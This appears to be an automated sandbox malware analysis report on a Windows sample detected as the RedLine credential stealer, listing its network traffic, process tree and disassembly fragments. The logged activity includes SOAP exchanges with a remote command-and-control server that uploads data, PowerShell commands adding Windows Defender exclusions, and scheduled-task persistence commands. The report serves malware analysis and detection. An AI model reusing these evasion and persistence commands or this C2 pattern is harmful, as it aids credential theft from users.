                                                        Nov 4, 2024 04:32:20.816849947 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 8064
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:19 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>139.186.206.86</b:string><b:string>112.244.133.106</b:string><b:string>113.100.145.59</b:string><b:string>14.19.28.125</b:string><b:string>36.143.61.93</b:string><b:string>120.229.169.226</b:string><b:string>27.214.63.21</b:string><b:string>125.94.23.107</b:string><b:string>114.95.213.233</b:string><b:string>219.137.198.172</b:string><b:string>84.57.190.182</b:string><b:string>113.78.94.204</b:string><b:string>125.123.233.96</b:string><b:string>113.68.110.168</b:string><b:string>172.174.62.166</b:string><b:string>103.149.33.156</b:string><b:string>121.226.48.220</b:string><b:string>14.221.49. [TRUNCATED]


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.6 | 49837 | 45.137.22.248 | 55615 | 7568 | C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 4, 2024 04:32:23.738605022 CET | 221 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 959930
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:25.678739071 CET | 294 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:24 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Nov 4, 2024 04:32:25.690970898 CET | 217 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 45.137.22.248:55615
                                                        Content-Length: 959922
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Nov 4, 2024 04:32:26.085789919 CET | 408 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Mon, 04 Nov 2024 03:32:24 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Target ID:0
                                                        Start time:22:31:54
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x860000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x310000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0x310000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"
                                                        Imagebase:0x690000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:22:32:00
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:22:32:01
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I5pvP0CU6M.exe"
                                                        Imagebase:0x5c0000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:22:32:01
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:22:32:04
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Imagebase:0x590000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 68%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:22:32:04
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff717f30000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                                                        Imagebase:0x690000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0x20000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:22:32:11
                                                        Start date:03/11/2024
                                                        Path:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                                                        Imagebase:0xf10000
                                                        File size:663'048 bytes
                                                        MD5 hash:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:22:32:12
                                                        Start date:03/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:9.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:9%
                                                          Total number of Nodes:167
                                                          Total number of Limit Nodes:10

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $ $ $ $7$V$V$[$g$q$u
                                                          • API String ID: 0-3960767134
                                                          • Opcode ID: 54dece4f0182f1ab12792903be69cde85e746fb9721fbaef455e941a46c39e66
                                                          • Instruction ID: 975c0fdf4e9acd5630bc32df02df4a337a8614b1b758bd33ac100b87ae39c18c
                                                          • Opcode Fuzzy Hash: 54dece4f0182f1ab12792903be69cde85e746fb9721fbaef455e941a46c39e66
                                                          • Instruction Fuzzy Hash: 0BB21A30A10709CFC715EF74C894B9AB7B6FF89304F518699D54AAB360EB71A985CF80

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $ $ $ $ $7$V$V$[$g$q$u
                                                          • API String ID: 0-3960767134
                                                          • Opcode ID: a08483938420376fe123eeaaacd935ae848cdbce4f6bb3e06587568fa8f1f383
                                                          • Instruction ID: 79627de12afa674da5c3ae24642a3fc95e52ba2e69e9894fcef5d6f5c5b39b4c
                                                          • Opcode Fuzzy Hash: a08483938420376fe123eeaaacd935ae848cdbce4f6bb3e06587568fa8f1f383
                                                          • Instruction Fuzzy Hash: 64B20B30A10709CFC715EF74C894B9AB7B6FF89304F518699D54AAB360EB71A985CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4370ebfbecf516d9c6867a7e87fda57b37945ea947dec04382cffc62d12d1b9
                                                          • Instruction ID: f2a49a0a73978e0e5933c64e3718192bc02113bd4cdd74d1762ae61c319cad7d
                                                          • Opcode Fuzzy Hash: e4370ebfbecf516d9c6867a7e87fda57b37945ea947dec04382cffc62d12d1b9
                                                          • Instruction Fuzzy Hash: 34426F74A11229CFDB64CF69D984B9DBBF2FB48310F1181A9E809A7355D730AE81CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be44fafe3c421b07e642bd64a99261e49ff2ce75adc733220ae1ff634fc915ee
                                                          • Instruction ID: ad1e998802a29de9c5845a3ea8951d9ef63c01faa81dcd6fd796d8c1e7aab47b
                                                          • Opcode Fuzzy Hash: be44fafe3c421b07e642bd64a99261e49ff2ce75adc733220ae1ff634fc915ee
                                                          • Instruction Fuzzy Hash: 5B32B270A00259CFEB54DFA9C580A8EFBF2BF48211F55D295D848AB215DB30DD86CFA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba987f070c32689bcfb5bdc8b2ee82be0cd70aaba95873a27ef6b7f0783aa366
                                                          • Instruction ID: c1b8823f08b756bc2b9d7a986d959b5102957abb042c31fa958d1a5e225ae936
                                                          • Opcode Fuzzy Hash: ba987f070c32689bcfb5bdc8b2ee82be0cd70aaba95873a27ef6b7f0783aa366
                                                          • Instruction Fuzzy Hash: D161A575E01218DFDB18CF6AD985B9DBBF2FF88310F1481A9E809AB254DB719941CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a6ac8e46b7bf6146995b7bf7b280b5302574a797aa9527bdf2924c6e0e3e052
                                                          • Instruction ID: f66ac0dd664b4edb7a3e45d7ff09dafba7828014a376f1ac0109b03ff91cf4ea
                                                          • Opcode Fuzzy Hash: 7a6ac8e46b7bf6146995b7bf7b280b5302574a797aa9527bdf2924c6e0e3e052
                                                          • Instruction Fuzzy Hash: 51517275D016199FDB08DFEAC9446EEFBF2BF89300F14812AD819AB254DB345946CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dfbdfed0d6f70f08cf659fac00f5b30ecaf49eaa186d828063410f3a43e3cdf
                                                          • Instruction ID: 9de61c3877dbb5ea3e8717eff3b68efdd01dcb6606603d38c8d698ba86f4988e
                                                          • Opcode Fuzzy Hash: 9dfbdfed0d6f70f08cf659fac00f5b30ecaf49eaa186d828063410f3a43e3cdf
                                                          • Instruction Fuzzy Hash: B941F474D062189BDB04CFAAD8856EEFBF6BF89300F10942AD819AB358DB7459058F60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d459f7e364925d8521a3261a44ce5e6e44c95779d4b8f0db1f0741b52f9782b
                                                          • Instruction ID: 77d470042a2ad449e6a27375888f80fff79cf10cbc04ae230a6e34d0e262d603
                                                          • Opcode Fuzzy Hash: 3d459f7e364925d8521a3261a44ce5e6e44c95779d4b8f0db1f0741b52f9782b
                                                          • Instruction Fuzzy Hash: 2941D471E006189FEB58DFABC84179EFBF2BF89300F14C0A9D45DA6255EB305A858F61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92d4b636c86de5f0e331ea7c75517c5ed4ce790cc2968469d66f13eb158d805c
                                                          • Instruction ID: 7be01c2ce8b162304c742d7e1b830c6d9ed27d4010baad45cd8587f9293fe473
                                                          • Opcode Fuzzy Hash: 92d4b636c86de5f0e331ea7c75517c5ed4ce790cc2968469d66f13eb158d805c
                                                          • Instruction Fuzzy Hash: BD417275E006199FDB08DFEAD8456AEFBF2BF88300F14C12AD819AB254EB345946CF50

                                                          Control-flow Graph

                                                          control_flow_graph 556 10cd288-10cd327 GetCurrentProcess 561 10cd329-10cd32f 556->561 562 10cd330-10cd364 GetCurrentThread 556->562 561->562 563 10cd36d-10cd3a1 GetCurrentProcess 562->563 564 10cd366-10cd36c 562->564 565 10cd3aa-10cd3c5 call 10cd469 563->565 566 10cd3a3-10cd3a9 563->566 564->563 570 10cd3cb-10cd3fa GetCurrentThreadId 565->570 566->565 571 10cd3fc-10cd402 570->571 572 10cd403-10cd465 570->572 571->572
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD316
                                                          • GetCurrentThread.KERNEL32 ref: 010CD353
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD390
                                                          • GetCurrentThreadId.KERNEL32 ref: 010CD3E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 375a50a3e3d6046ba554114d215f867e9086326f7383a16b2ac775ec71ac0f0f
                                                          • Instruction ID: e9cbfca0257e90d52280f60ce4d292f58f8481fefaca9bd80e58e8c873989066
                                                          • Opcode Fuzzy Hash: 375a50a3e3d6046ba554114d215f867e9086326f7383a16b2ac775ec71ac0f0f
                                                          • Instruction Fuzzy Hash: 705188B09003498FDB44CFAAD588B9EBFF1FF88314F208499E148A72A0DB746944CF61

                                                          Control-flow Graph

                                                          control_flow_graph 579 10cd298-10cd327 GetCurrentProcess 583 10cd329-10cd32f 579->583 584 10cd330-10cd364 GetCurrentThread 579->584 583->584 585 10cd36d-10cd3a1 GetCurrentProcess 584->585 586 10cd366-10cd36c 584->586 587 10cd3aa-10cd3c5 call 10cd469 585->587 588 10cd3a3-10cd3a9 585->588 586->585 592 10cd3cb-10cd3fa GetCurrentThreadId 587->592 588->587 593 10cd3fc-10cd402 592->593 594 10cd403-10cd465 592->594 593->594
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD316
                                                          • GetCurrentThread.KERNEL32 ref: 010CD353
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD390
                                                          • GetCurrentThreadId.KERNEL32 ref: 010CD3E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 2c6091e0c6afe21c4c237bf5507032744e5c5d794a340fd9b43cd9d68d0fce42
                                                          • Instruction ID: d33830e4ba859f230a8f44ca02ab0b892da577c798bb34cc891e61cac0b5dd82
                                                          • Opcode Fuzzy Hash: 2c6091e0c6afe21c4c237bf5507032744e5c5d794a340fd9b43cd9d68d0fce42
                                                          • Instruction Fuzzy Hash: 2C5175B19007098FDB44CFAAD588B9EBFF1BF88314F208469E149A72A0DB746944CF65

                                                          Control-flow Graph

                                                          control_flow_graph 628 10caed9-10caef7 630 10caef9-10caf06 call 10c9e40 628->630 631 10caf23-10caf27 628->631 637 10caf1c 630->637 638 10caf08 630->638 633 10caf29-10caf33 631->633 634 10caf3b-10caf7c 631->634 633->634 640 10caf7e-10caf86 634->640 641 10caf89-10caf97 634->641 637->631 684 10caf0e call 10cb53a 638->684 685 10caf0e call 10cb570 638->685 686 10caf0e call 10cb580 638->686 640->641 642 10caf99-10caf9e 641->642 643 10cafbb-10cafbd 641->643 645 10cafa9 642->645 646 10cafa0-10cafa7 call 10c9e4c 642->646 648 10cafc0-10cafc7 643->648 644 10caf14-10caf16 644->637 647 10cb058-10cb118 644->647 650 10cafab-10cafb9 645->650 646->650 679 10cb11a-10cb11d 647->679 680 10cb120-10cb14b GetModuleHandleW 647->680 651 10cafc9-10cafd1 648->651 652 10cafd4-10cafdb 648->652 650->648 651->652 653 10cafdd-10cafe5 652->653 654 10cafe8-10caff1 call 10c9e5c 652->654 653->654 660 10caffe-10cb003 654->660 661 10caff3-10caffb 654->661 662 10cb005-10cb00c 660->662 663 10cb021-10cb02e 660->663 661->660 662->663 665 10cb00e-10cb01e call 10c9e6c call 10c9e7c 662->665 670 10cb030-10cb04e 663->670 671 10cb051-10cb057 663->671 665->663 670->671 679->680 681 10cb14d-10cb153 680->681 682 10cb154-10cb168 680->682 681->682 684->644 685->644 686->644
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 010CB13E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: bacc0a23292a97a8da4e0af7be364e842d7131ea688f9cf0ccc5bc1956053901
                                                          • Instruction ID: bcf92fb5038d54260b999358292066f8b6bb6823ba20bc26dc35e9c2d40cb6d7
                                                          • Opcode Fuzzy Hash: bacc0a23292a97a8da4e0af7be364e842d7131ea688f9cf0ccc5bc1956053901
                                                          • Instruction Fuzzy Hash: 238157B0A00B058FE764DF69D04579ABBF1BF88700F008A6DE496D7A81D774E846CF90

                                                          Control-flow Graph

                                                          control_flow_graph 687 2b81ac4-2b81b36 689 2b81b38-2b81b3e 687->689 690 2b81b41-2b81b48 687->690 689->690 691 2b81b4a-2b81b50 690->691 692 2b81b53-2b81bf2 CreateWindowExW 690->692 691->692 694 2b81bfb-2b81c33 692->694 695 2b81bf4-2b81bfa 692->695 699 2b81c40 694->699 700 2b81c35-2b81c38 694->700 695->694 701 2b81c41 699->701 700->699 701->701
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B81BE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 8d0b69ac750189d0e66aa4b7dd6a65e40328f3764c17b3746ae99ac5ee327e09
                                                          • Instruction ID: b9208975c1711b3d3c32b1870387865c5da4c6940f56beff503e41504ad934b6
                                                          • Opcode Fuzzy Hash: 8d0b69ac750189d0e66aa4b7dd6a65e40328f3764c17b3746ae99ac5ee327e09
                                                          • Instruction Fuzzy Hash: A551C0B1D11349DFDB14CFA9C884ADEBBB5FF48310F24816AE919AB210D7759886CF90

                                                          Control-flow Graph

                                                          control_flow_graph 702 2b81ad0-2b81b36 703 2b81b38-2b81b3e 702->703 704 2b81b41-2b81b48 702->704 703->704 705 2b81b4a-2b81b50 704->705 706 2b81b53-2b81bf2 CreateWindowExW 704->706 705->706 708 2b81bfb-2b81c33 706->708 709 2b81bf4-2b81bfa 706->709 713 2b81c40 708->713 714 2b81c35-2b81c38 708->714 709->708 715 2b81c41 713->715 714->713 715->715
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B81BE2
                                                          Memory Dump Source
